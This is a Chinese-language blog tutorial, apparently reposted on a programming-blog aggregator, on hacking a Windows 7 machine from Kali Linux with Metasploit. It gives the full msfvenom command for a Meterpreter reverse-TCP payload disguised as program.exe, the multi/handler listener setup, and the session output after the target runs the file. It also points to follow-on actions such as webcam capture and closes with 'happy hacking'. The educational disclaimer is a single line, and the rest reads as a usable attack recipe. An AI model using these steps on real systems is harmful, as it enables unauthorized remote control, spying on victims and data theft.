程序博客网 > 速录测试软件

如何使用 Kali Linux 黑掉 Windows

来源:互联网 发布:速录测试软件 编辑:程序博客网 时间:2024/04/28 13:14

Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码security exploit的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。

源机器详情

Kali Linux

  1. root@kali:/# uname -a
  2. Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
  3. root@kali:/#

用做攻击对象的目标机器:

  1. Windows 7 Ultimate SP1

步骤 1:创建 Payload 程序

Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。

  1. root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  3. No Arch selected, selecting Arch: x86 from the payload
  4. No encoder or badchars specified, outputting raw payload
  5. Payload size: 333 bytes
  6. Final size of exe file: 73802 bytes
  7. Saved as: /root/program.exe
  8. root@kali:/# ls -la /root/program.exe
  9. -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

通过 ls 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。

步骤 2:运行 mfsconsole 命令启动 msf 命令窗口

  1. root@kali:# msfconsole
  4.                                    .,,.                  .
  5.                                 .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
  6.                      d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
  7.                   d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  8.   d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  9.   88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
  10.  d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
  11. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
  12.                           .a#$$$$$$"`          88b  d8P  88b`?8888P'
  13.                        ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
  14.                     .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
  15.                  .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
  16.               ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
  17.            .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
  18. _______________________________________________________________   ,&$$$$$$'_____
  19.                                                                  ll&&$$$$'
  20.                                                               .;;lll&&&&'
  21.                                                             ...;;lllll&'
  22.                                                           ......;;;llll;;;....
  23.                                                            ` ......;;;;... .  .
  26. Taking notes in notepad? Have Metasploit Pro track & report
  27. your progress and findings -- learn more on http://rapid7.com/metasploit
  29.        =[ metasploit v4.12.22-dev                         ]
  30. + -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
  31. + -- --=[ 455 payloads - 39 encoders - 8 nops             ]
  32. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  34. msf >

步骤 3:进行漏洞利用的细节

  • 4444 端口:你可以按照自己的想法来选择使用哪个端口
  • LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。
  1. root@kali:/# ip r l
  2. 192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
  3. root@kali:/#

现在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) >

然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp

  1. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  2. payload => windows/meterpreter/reverse_tcp

现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下:

  1. msf exploit(handler) > set lhost 192.168.189.128
  2. lhost => 192.168.189.128
  3. msf exploit(handler) > set lport 4444
  4. lport => 4444

最后使用 exploit 命令。

  1. msf exploit(handler) > exploit
  3. [*] Started reverse TCP handler on 192.168.189.128:4444
  4. [*] Starting the payload handler...

现在你需要在 Windows 上运行 program.exe,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。

  1. msf exploit(handler) > exploit
  3. [*] Started reverse TCP handler on 192.168.189.128:4444
  4. [*] Starting the payload handler...
  5. [*] Sending stage (957999 bytes) to 192.168.189.1
  6. [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
  8. meterpreter > sysinfo
  9. Computer        : MANN-PC
  10. OS              : Windows 7 (Build 7601, Service Pack 1).
  11. Architecture    : x64 (Current Process is WOW64)
  12. System Language : en_IN
  13. Domain          : WORKGROUP
  14. Logged On Users : 2
  15. Meterpreter     : x86/win32

一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 help 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 webcam_snap 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! ←_←

0 0
速录测试软件 速录测试软件
原创粉丝点击
热门IT博客
邮政小包软件邮政小包软件
pdf.js不支持ie11pdf.js不支持ie11
医疗软件销售怎么样
港股直通车软件
免费微信夺宝系统源码
单片机lcd1602日历程序
铁路预算软件
男士面膜推荐 知乎
淘宝店标在线设计
寻路算法之a star
长沙java
vs画图软件
北京供销大数据是国企
js获取file路径
papi酱与papitube知乎
吊带承重数据
淘宝关闭返利
gov域名注册申请表
linux下怎么用string
查图片出处软件
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 粘土是橡皮泥吗 粘土小黄人 粘土砖墙 粘土制作恐龙 粘土寿司 粘土食物 粘土布 diy粘土 粘土动物 粘土人物 小黄人超轻粘土 超轻粘土怎么玩 粘土龙猫 龙猫粘土 粘土矿物 粘土心墙 粘土汽车 粘土老虎 粉质粘土描述 砂质粘土 玩粘土 超轻粘土人物制作教程 粘土照片 粘土矿 哆啦a梦粘土 粘土造型 粘土读音 粘土战士 粘土手机链 粘土调色 超轻粘土 可爱 黏度 水的黏度 黏度单位 黏度的单位是什么 精液黏度 黏度杯 黏度计 机油黏度高好还是低好 水在不同温度下的黏度 黏液性结肠炎

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里